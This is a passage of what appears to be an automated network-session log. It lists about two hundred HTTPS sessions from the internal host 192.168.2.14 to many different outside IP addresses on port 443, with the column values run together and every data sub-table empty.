                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        19039192.168.2.145049049.229.105.59443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        19040192.168.2.1444582166.102.213.76443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        19041192.168.2.1444338118.74.242.52443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        19042192.168.2.1448246123.154.91.67443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        19043192.168.2.145596495.55.69.55443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        19044192.168.2.1458620125.168.140.250443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        19045192.168.2.144633837.241.53.221443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        19046192.168.2.1451002132.75.234.24443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        19047192.168.2.143883098.223.176.175443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        19048192.168.2.1453790212.160.118.109443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        19049192.168.2.144579063.82.42.24443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        19050192.168.2.1433686102.183.230.166443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        19051192.168.2.1442220211.204.40.3443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        19052192.168.2.144555267.107.88.251443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        19053192.168.2.145160659.186.83.7443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        19054192.168.2.1457752199.34.254.244443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        19055192.168.2.1443380206.214.246.244443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        19056192.168.2.144472698.239.74.237443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        19057192.168.2.1444656115.71.133.235443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        19058192.168.2.144560281.35.60.195443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        19059192.168.2.145335273.183.48.107443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        19060192.168.2.143721834.214.35.129443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        19061192.168.2.1454570105.70.211.31443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        19062192.168.2.1441970148.255.49.23443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        19063192.168.2.1439052171.146.74.142443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        19064192.168.2.144032878.177.220.226443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        19065192.168.2.1441110220.32.163.186443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        19066192.168.2.1453364186.104.50.178443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        19067192.168.2.1442166171.168.76.49443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        19068192.168.2.144795864.19.245.22443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        19069192.168.2.1437776221.10.66.228443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        19070192.168.2.145462225.66.224.134443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        19071192.168.2.1442976199.247.73.116443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        19072192.168.2.144016295.246.213.207443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        19073192.168.2.1448982136.78.135.105443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        19074192.168.2.144998623.90.23.83443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        19075192.168.2.1443462110.24.104.8443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        19076192.168.2.1445970102.216.255.189443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        19077192.168.2.1448200120.143.105.235443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        19078192.168.2.1454638125.75.159.115443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        19079192.168.2.146038217.114.25.134443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        19080192.168.2.143486297.3.182.114443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        19081192.168.2.145414282.213.236.60443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        19082192.168.2.1455942160.16.111.25443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        19083192.168.2.1437714221.126.248.129443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        19084192.168.2.1441014170.238.224.190443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        19085192.168.2.1457640106.169.53.243443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        19086192.168.2.1457122126.113.29.4443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        19087192.168.2.144152674.62.91.154443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        19088192.168.2.1435976199.212.44.7443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        19089192.168.2.1443698101.99.98.173443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        19090192.168.2.1452482148.66.30.128443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        19091192.168.2.1433804137.112.174.93443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        19092192.168.2.145163072.162.243.211443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        19093192.168.2.1445766138.244.156.149443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        19094192.168.2.1456650115.38.29.229443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        19095192.168.2.145705075.138.162.62443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        19096192.168.2.1439608182.87.188.16443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        19097192.168.2.145685031.185.50.8443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        19098192.168.2.1435830139.229.157.90443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        19099192.168.2.1448374114.211.183.108443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        19100192.168.2.145913650.96.109.90443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        19101192.168.2.143824493.78.72.1443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        19102192.168.2.1433788209.185.196.38443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        19103192.168.2.1448738171.202.199.74443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        19104192.168.2.14498022.230.56.7443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        19105192.168.2.1447090155.4.103.84443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        19106192.168.2.1440006156.237.90.151443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        19107192.168.2.1437668171.250.62.135443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        19108192.168.2.143512078.152.235.205443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        19109192.168.2.144182673.241.10.211443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        19110192.168.2.145607637.252.171.223443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        19111192.168.2.1452824208.81.238.132443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        19112192.168.2.1450388193.4.111.122443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        19113192.168.2.144349020.175.27.57443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        19114192.168.2.1437880213.108.199.51443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        19115192.168.2.1433248213.63.151.231443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        19116192.168.2.1459720158.194.155.191443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        19117192.168.2.144168298.146.160.96443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        19118192.168.2.145759013.107.213.35443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        19119192.168.2.144129877.249.207.194443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        19120192.168.2.1459428193.70.154.214443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        19121192.168.2.143666276.9.61.15443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        19122192.168.2.1450114197.30.247.53443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        19123192.168.2.145229648.168.187.28443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        19124192.168.2.1440586138.110.99.168443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        19125192.168.2.1455700141.21.238.169443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        19126192.168.2.1445232188.135.99.59443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        19127192.168.2.1439466123.63.160.69443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        19128192.168.2.1434588185.147.191.36443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        19129192.168.2.1460614221.12.179.60443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        19130192.168.2.1441992183.133.153.117443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        19131192.168.2.1452122195.148.57.29443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        19132192.168.2.146074472.191.160.216443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        19133192.168.2.1443124118.7.34.55443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        19134192.168.2.1450426196.200.16.60443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        19135192.168.2.1460012203.95.129.124443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        19136192.168.2.143729862.14.174.207443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        19137192.168.2.1459426146.215.61.73443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        19138192.168.2.144158867.58.101.170443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        19139192.168.2.1443654115.65.53.141443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        19140192.168.2.1457552197.199.44.195443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        19141192.168.2.145038246.193.175.122443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        19142192.168.2.1439364148.171.1.175443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        19143192.168.2.1434922110.161.115.238443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        19144192.168.2.144629898.219.116.223443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        19145192.168.2.145789479.164.208.56443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        19146192.168.2.144212063.190.17.111443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        19147192.168.2.1436654212.186.199.38443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        19148192.168.2.144943089.179.11.138443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        19149192.168.2.1436342177.230.163.14443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        19150192.168.2.14342082.3.240.43443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        19151192.168.2.144147258.213.44.52443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        19152192.168.2.145482493.94.155.182443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        19153192.168.2.145993289.209.221.21443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        19154192.168.2.1460476186.180.215.58443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        19155192.168.2.1448670164.222.188.57443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        19156192.168.2.1460688194.100.230.185443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        19157192.168.2.143917688.252.207.95443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        19158192.168.2.144454853.93.103.46443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        19159192.168.2.1438952160.86.130.233443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        19160192.168.2.1438818128.243.140.27443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        19161192.168.2.144763818.195.158.151443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        19162192.168.2.1448880184.160.48.159443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        19163192.168.2.1435672169.15.243.175443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        19164192.168.2.1444604150.13.43.188443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        19165192.168.2.1453042110.179.196.132443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        19166192.168.2.1451012175.104.207.148443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        19167192.168.2.144309220.223.55.16443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        19168192.168.2.1451798142.196.105.154443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        19169192.168.2.1458642222.248.110.187443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        19170192.168.2.1453858171.134.46.151443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        19171192.168.2.1443314184.38.226.51443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        19172192.168.2.1439040200.188.30.136443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        19173192.168.2.1456148183.100.153.190443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        19174192.168.2.1441490208.148.230.163443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        19175192.168.2.1440096117.239.65.77443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        19176192.168.2.1460376117.169.227.228443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        19177192.168.2.1435702173.52.0.119443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        19178192.168.2.145845677.84.167.233443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        19179192.168.2.14418862.35.118.37443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        19180192.168.2.1453186164.145.67.53443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        19181192.168.2.144813862.167.218.179443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        19182192.168.2.1457554205.226.106.141443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        19183192.168.2.1456592166.146.80.186443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        19184192.168.2.1438426209.97.21.67443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        19185192.168.2.145183275.123.123.229443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        19186192.168.2.1447392158.163.61.178443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        19187192.168.2.145494241.62.112.9443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        19188192.168.2.1454206131.71.44.42443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        19189192.168.2.1449134203.197.142.234443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        19190192.168.2.143710080.65.94.58443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        19191192.168.2.1437152103.198.37.239443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        19192192.168.2.1437760173.239.170.42443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        19193192.168.2.1446310196.213.99.125443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        19194192.168.2.1449016179.167.182.82443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        19195192.168.2.1433138172.9.246.105443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        19196192.168.2.1437184187.216.86.247443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        19197192.168.2.1455330112.139.178.19443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        19198192.168.2.145091258.208.59.237443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        19199192.168.2.145994452.105.88.0443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        19200192.168.2.1438730121.210.187.248443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        19201192.168.2.1438656157.254.31.251443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        19202192.168.2.1458036211.193.37.145443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        19203192.168.2.1454472182.114.232.85443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        19204192.168.2.143885874.204.176.137443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        19205192.168.2.1432878100.229.83.146443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        19206192.168.2.1451508160.131.44.107443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        19207192.168.2.1446602111.43.37.163443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        19208192.168.2.143757845.106.182.116443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        19209192.168.2.144075848.107.21.159443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        19210192.168.2.1460994116.176.83.125443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        19211192.168.2.145770645.223.19.118443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        19212192.168.2.1459400222.45.83.110443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        19213192.168.2.1452436177.225.64.141443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        19214192.168.2.1447738181.23.115.230443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        19215192.168.2.1455362185.55.250.20443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        19216192.168.2.1446250181.174.61.76443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        19217192.168.2.144884032.182.2.233443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        19218192.168.2.1440120210.87.102.247443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        19219192.168.2.1451474189.243.150.44443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        19220192.168.2.14354529.143.186.42443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        19221192.168.2.1456462126.231.7.101443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        19222192.168.2.146040254.118.179.192443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        19223192.168.2.1460562128.208.38.199443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        19224192.168.2.143859681.157.116.64443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        19225192.168.2.1444582119.86.221.235443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        19226192.168.2.1448190197.151.102.249443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        19227192.168.2.1447088130.42.168.160443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        19228192.168.2.1453008107.109.63.74443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        19229192.168.2.1436630160.134.243.44443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        19230192.168.2.1445350191.176.79.180443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        19231192.168.2.143412813.122.22.9443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        19232192.168.2.145124460.164.137.212443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        19233192.168.2.145665638.186.8.45443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        19234192.168.2.1438282125.142.40.102443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        19235192.168.2.1453318169.203.166.182443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        19236192.168.2.1447366121.211.202.3443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        19237192.168.2.144186842.93.169.89443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        19238192.168.2.1441818222.242.234.197443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        19239192.168.2.1440462123.69.157.127443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        19240192.168.2.144153295.78.113.87443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        19241192.168.2.1452320125.188.134.48443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        19242192.168.2.1435696118.91.140.174443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        19243192.168.2.1457752172.12.66.58443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        19244192.168.2.1458730210.34.141.30443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        19245192.168.2.1446802210.135.146.48443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        19246192.168.2.14417462.31.160.85443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        19247192.168.2.1458498172.254.46.168443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        19248192.168.2.1454898132.35.5.26443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        19249192.168.2.1440618153.55.192.66443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        19250192.168.2.1434286139.28.99.158443
                                                        TimestampBytes transferredDirectionData


